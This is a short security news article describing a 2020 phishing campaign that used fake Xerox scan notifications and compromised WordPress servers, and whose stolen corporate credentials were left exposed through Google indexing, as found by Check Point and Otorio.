Stolen Corporate Credentials Found in Google Searches
Hackers behind a recently phishing campaign left more than 1,000 stolen credentials available online via simple Google searches. The campaign, which began in August 2020, used e-mails that spoof notifications from Xerox scans to trick victims into clicking on malicious HTML attachments, according to security research firm Check Point Research.
Check Point worked with security firm Otorio to find the campaign, which managed to bypass Microsoft Office 365 Advanced Threat Protection ( ATP ) filtering to steal more than 1,000 corporate credentials. While this is is a typical phishing campaign, hackers made a mistake in their attack chain”that left the stolen credentials exposed on the internet, across dozens of drop-zone servers used by the hackers. This happened because the hackers stored the stolen credentials in designated webpages on compromised servers. Since Google constantly indexes the internet, the search engine also indexed these pages, making them available to anyone who queried Google for a stolen email address.
The campaign targeted a number of industries, including retail, manufacturing, healthcare and IT. There is evidence that the campaign is not the hackers first time, as emails and JavaScript encoding used in the attacks correlated to a phishing campaign from May 2020. The phishing campaign started with an email using one of several phishing templates faking a Xerox notification with the victim's first name or company title in the subject line. The email included an HTML file that, once clicked on, would prompt the user with a lookalike login page for Xerox.
The servers used by the campaign were dozens of WordPress websites that contained malicious PHP pages and would process all incoming credentials from the phishing victims. The campaign not only evaded Microsoft 365 ATP but also most anti-virus protections through its simple use of compromised servers. Hackers also continuously polished and refined their code to create a realistic experience so the victims were less suspicious, and more likely to provide their login credentials.